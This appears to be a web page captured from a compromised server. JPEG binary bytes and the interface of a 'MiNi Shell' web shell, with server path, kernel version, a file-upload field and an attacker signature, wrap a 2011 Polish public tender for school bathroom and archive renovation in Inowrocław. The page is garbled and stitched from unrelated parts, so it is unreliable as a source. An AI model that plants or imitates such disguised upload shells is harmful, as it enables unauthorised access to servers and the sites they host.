JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/138894-N-2011.html

<p class="kh_header"><b>Inowrocław: Kompleksowy remont łazienek, pomieszczenia z prysznicami oraz adaptacja piwnicy na archiwum w budynku Gimnazjum nr 3 w Inowrocławiu</b><br>
<b>Numer ogłoszenia: 138894 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Inowrocław Gimnazjum Nr 3 , ul. Łokietka 3, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 357 38 70, faks 52 352 40 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://gim3.inowroclaw.fr.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowy remont łazienek, pomieszczenia z prysznicami oraz adaptacja piwnicy na archiwum w budynku Gimnazjum nr 3 w Inowrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót konstrukcyjno-budowlanych, instalacyjnych - sanitarnych oraz w zakresie instalacji elektrycznych dotyczących kompleksowego remontu łazienek wraz z niezbędną przebudową szatni, remontem pomieszczeń nauczycieli w-fu, wykonanie pomieszczenia archiwum w piwnicy oraz wydzielenie części piwnic ścianką EI 30 w budynku Gimnazjum nr 3 w Inowrocławiu, zgodnie z dokumentacją projektową załączoną  do siwz.

Zakres robót: Roboty konstrukcyjno-budowlane, instalacyjne - sanitarne oraz w zakresie instalacji elektrycznych, tj.:
a) pomieszczenie aktualnego archiwum - na parterze istniejące archiwum należy adaptować na pomieszczenie z prysznicami z wejściem z szatni dziewcząt oraz szatni chłopców. Drzwi należy zaopatrzyć w zamknięcie od wewnątrz tak aby możliwe było korzystanie z natrysku w jednym czasie tylko z jednej szatni. W pomieszczeniu 04 należy wykonać zamurowanie otworu drzwiowego oraz wykuć w ściankach działowych dwa nowe otwory tak aby można wmontować drzwi 80 PCV. W pomieszczeniu 04 płytki należy wykonać na wysokość całej ściany z płytek w kolorach jasnych układanych metodą kombinowaną. Na posadzce projektuje się płytki gresowe o klasie antypoślizgowości min R11. Wszystkie rozprowadzenia wody wykonać z rur PP zgrzewanych bądź PEX-ALL-PEX lub równorzędnych. Odprowadzenia wody wykonać z rur PCV łączonych na uszczelki. Baterie - mieszacz czasowy podtynkowy natryskowy typ - 9009MIX Model: MAKI-284 bądź równorzędny. 
b)  pomieszczenie szatni chłopców - ze względu na poprawę funkcji pomieszczeń należy zamurować istniejące wejście do szatni i prysznicy /pomieszczenie 04/ oraz wykuć nowe wejście z korytarza na wprost. Wszystkie drzwi należy wykonać z ościeżnicą regulowaną np. PORTA AGAT CPL HQ 0,2mm bądź równorzędne /drzwi o mocnej konstrukcji skrzydła/. W pomieszczeniu należy układać płytki do wysokości 2,20 m w jasnych żywych kolorach układanych metoda kombinowaną. Na posadzce należy ułożyć płytki kolorystycznie dopasowane do płytek na ścianie o antypoślizgowości min R11. Powyżej ściana malowana farbami do wnętrz. W szatni projektuje się ławki drewniane zamocowane na stałe do podłogi na 3 ścianach. Projektowane ławki drewniane muszą być zaopatrzone w półkę dolną na torbę oraz obuwie. W szatniach nad ławkami projektuje się wieszaki bezpieczne odwrócone z kształtowników stalowych malowanych proszkowo w kolorach zbliżonych do brązowego. Wieszaki podwójne /dwurzędowe/.
c) pomieszczenie szatni dziewcząt - podobnie jak w przypadku szatni chłopców aby poprawić funkcjonalność pomieszczenia należy zamurować istniejące wejście do szatni. W pomieszczeniu należy układać płytki do wysokości 2,20 m w jasnych żywych kolorach układanych metodą kombinowaną. Na posadzce należy ułożyć płytki kolorystycznie dopasowane do płytek na ścianie o antypoślizgowości min R11. Powyżej ściana malowana farbami do wnętrz. Ławki drewniane identyczne jak w szatni chłopców, zamocowane do posadzki na dwóch ścianach.
d) pomieszczenie WC - w pomieszczeniach szatni znajdują się przynależne WC. Pomieszczenie 05 i 06 należy poddać kompleksowemu remontowi polegającemu na skuciu istniejących okładzin ściennych oraz podłogowych w ich miejsce należy wykonać nowe płytki na ścianie na wysokość całego pomieszczenia, na posadzce płytki min R11. Cała armatura w pomieszczeniach wymieniona na nową. Istniejące skrzydła drzwiowe należy wymienić na nowe D80. W pomieszczeniu należy zamontować po dwie umywalki. Cała instalacja wodna z rur PP zgrzewanych lub z materiałów równorzędnych. Instalacja sanitarna z rur PCV.
e) pomieszczenie nauczycieli WF-u - istniejący pokój nauczycieli WF-u jest zbyt mały aby pomieścić przebywających tam pracowników w komfortowych warunkach dlatego pomieszczenie sprzątaczek 01 połączono drzwiami tworząc dodatkowe miejsce pracy. Otwór drzwiowy należy wykonać w ścianie działowej. W pomieszczeniach należy przewidzieć obudowanie rur kanalizacyjnych oraz rur wodnych płytą GK na stelażu. Projektuje się wykonanie nowej posadzki w obu pomieszczeniach z płytek gresowych o kolorystyce odmiennej od tej zastosowanej w pomieszczeniach szatni - płytki min R11. Na ścianach przewidziano ułożenie pasa międzyszafkowego przy zlewozmywaku oraz montaż nowej baterii zlewozmywakowej. Pozostała część ścian malowana farbami akrylowymi.
f) armatura sanitarna - montaż umywalek, misek ustępowych, zaleca się aby wszystkie te urządzenia były wybrane od jednego producenta celem uniknięcia odmiennej kolorystyki. Spłuczki w kabinach należy zamontować z funkcja STOP. 
g) drzwi - drzwi do pomieszczeń projektuje się jako wzmocnione np. PORTA AGAT CPL HQ 0,2mm bądź równorzędne /drzwi o wzmocnionej konstrukcji skrzydła/. Drzwi do pomieszczeń WC PORTA LINE pełne wypełnienie skrzydeł płyta wiórowa otworowania z ościeżnicą regulowaną bądź równorzędne skrzydło należy zaopatrzyć w kratkę wentylacyjną bądź systemowe podcięcie skrzydła. Do sali gimnastycznej drzwi przesuwane np. typu PORTA KOMPAKT. W piwnicy należy zastosować skrzydła EI 30. Kolorystyka wszystkich drzwi w jednym odcieniu zaleca się aby wszystkie drzwi były od jednego producenta.
h) roboty malarskie - na ścianach powyżej płytek należy wykonać 2 x gładź z malowaniem na kolory jasne. Sufity malowane w kolorze białym po wcześniejszym naniesieniu 2 krotnej gładzi.
i) instalacja wodno-kanalizacyjna - wymiana całości instalacji w pomieszczeniach. Proponuje się nowe rozprowadzenie przewodów instalacji wodnej z rur PP lub równoważnych w ścianach. Piony kanalizacji sanitarnej wymiana na PCV.
j) instalacja elektryczna - projekt przewiduje następujące urządzenia i instalacje zasilające i odbiorcze: instalację gniazd wtyczkowych; instalację oświetlenia podstawowego, awaryjnego; rozbudowę rozdzielnic i tablic; instalacja przeciwporażeniowa i w zakresie ochrony przepięciowej.
k) pomieszczenie archiwum w piwnicy - w piwnicy znajdują się niezagospodarowane pomieszczenia w stanie surowym. Jedno z takich pomieszczeń należy zaadaptować na archiwum. W tym celu konieczne będzie wykonanie nadproża drzwiowego w ścianie nośnej jako nadproże należy zastosować dwuteownik HEB 160. Nadproże stalowe należy zabezpieczyć przed korozją przez oczyszczenie powierzchni do 3 stopnia czystości i odpylenie oraz pokrycie następującymi warstwami malarskimi : 2 krotnie farba olejna miniowa 80%, 2 krotnie emalia ftalowa ogólnego stosowania. Aby mieć swobodny dostęp do pomieszczenia archiwum konieczne będzie wykonanie stopni betonowych. Zastosowane drzwi będą miały niestandardowa wysokość ok. 190 cm. Projektowane pomieszczenie należy wyposażyć w instalację elektryczną oraz internetową wg zaleceń z projektu elektrycznego.
Regały w archiwum należy ustawić zgodnie ze schematem rysunkowym. Elementy nośne (słupy i półki) profilowane są z blach zimnowalcowanych a następnie lakierowane farbami proszkowymi. Regał należy wyposażyć w ograniczniki boczne i tylne wykonane z blachy. Zapobiegają one wypadaniu dokumentów z regału. Montaż odbywa się z udziałem śrub i nakrętek M8. Nośność półki ustala się na 200 kg.
l) pozostałe prace - w łazienkach należy przewidzieć obudowanie rury kanalizacyjnej oraz rur wodnych płytą GK na stelażu.

Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót, załączone do niniejszej siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.11.00-8, 45.33.00.00-9, 45.31.00.00-3, 45.41.00.00-4, 45.42.00.00-7, 45.43.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie roboty budowlane, w zakres branży konstrukcyjno-budowlanej, instalacyjnej - sanitarnej oraz instalacji elektrycznych, odpowiadających rodzajowo przedmiotowi zamówienia. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych robót budowlanych oraz dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami posiadającymi uprawnienia budowlane w specjalnościach: konstrukcyjno-budowlanej, instalacyjnej - sanitarnej oraz instalacji elektrycznych.
Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu osób uczestniczących w wykonywaniu zamówienia oraz oświadczenia, ze wymienione osoby posiadają wymagane uprawnienia budowlane; na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">należy przedłożyć kosztorys ofertowy</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy,
2) dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli wystąpią następujące okoliczności:
1)	zmiana terminu wykonania zamówienia - Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a)	przekazania dokumentacji budowy, do przekazania których zamawiający był zobowiązany,
b)	zapewnienia  możliwości  poboru wody i energii elektrycznej na potrzeby budowy,
c)	zmiany terminu dokonania odbiorów przewidzianych w umowie.
d)	zawieszenia robót przez Zamawiającego,
e)	szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  
f)	   działanie siły wyższej, klęski żywiołowej,
g)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkody, za które wykonawca nie ponosi odpowiedzialności (wystąpiły okoliczności, których nie można było przewidzieć, mimo zachowania należytej staranności),
h)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
i)	   odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
2)	jeżeli powstały konieczne zmiany technologiczne, w szczególności:
a)	konieczności zrealizowania projektu  przy  zastosowaniu innych  rozwiązań  technicznych/technologicznych  niż wskazane w dokumentacji  projektowej w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem  lub wadliwym  wykonaniem  projektu,
b)	wystąpiła konieczność wprowadzenia zmian w dokumentacji projektowej, sposobie lub technologii wykonania przedmiotu umowy uzasadniona w szczególności  bezpieczeństwem ludzi i mienia, ochroną środowiska, zmianą prawa itp., za zgodą autora dokumentacji projektowej, a w konsekwencji wprowadzenie robót zamiennych,
c)	ze względu na specyfikę robót remontowych prowadzonych w warunkach gdy wiele elementów jest zakrytych, w trakcie realizacji robót wystąpiły nieprzewidziane okoliczności, w wyniku których może zajść potrzeba zmiany określonego w projekcie zakresu robót i ich ilości, a nawet sposobu wykonania.
3) pozostałe zmiany: 
a)	zmiana warunków finansowania zamówienia,
b)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
c)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę,
d)	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługuje  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami,
e)	kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w siwz i ofercie wykonawcy.
Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia; przyjmuje się następujące zasady wyceny robót  dodatkowych (lub zamiennych): rozliczenie na podstawie kosztorysów przygotowanych przez Wykonawcę, a zatwierdzonych przez inspektora nadzoru i Zamawiającego. Kosztorysy te opracowane będą w oparciu o następujące założenia: ceny czynników produkcji (rbg, M, S, Ko, Z) zostaną przyjęte z kosztorysu   ofertowego złożonego przez wykonawcę. Podstawą do określenia nakładów rzeczowych będą normy zawarte w kosztorysach ofertowych, a przypadku ich braku - odpowiednie pozycje KNR. W przypadku braku odpowiednich pozycji w KNR zastosowane zostaną pozycje KNNR, a następnie wycena indywidualna wykonawcy, zatwierdzona przez Zamawiającego,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.

Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. inspektor nadzoru oraz kierownik budowy.
Zmiany postanowień umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://gim3.inowroclaw.fr.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum nr 3, ul. Łokietka 3, 88-100 Inowrocław - sekretariat szkoły (parter budynku), od poniedziałku do piątku w godz. 8:00 do 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2011 godzina 10:45, miejsce: Gimnazjum nr 3, ul. Łokietka 3, 88-100 Inowrocław - sekretariat szkoły (parter
budynku).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com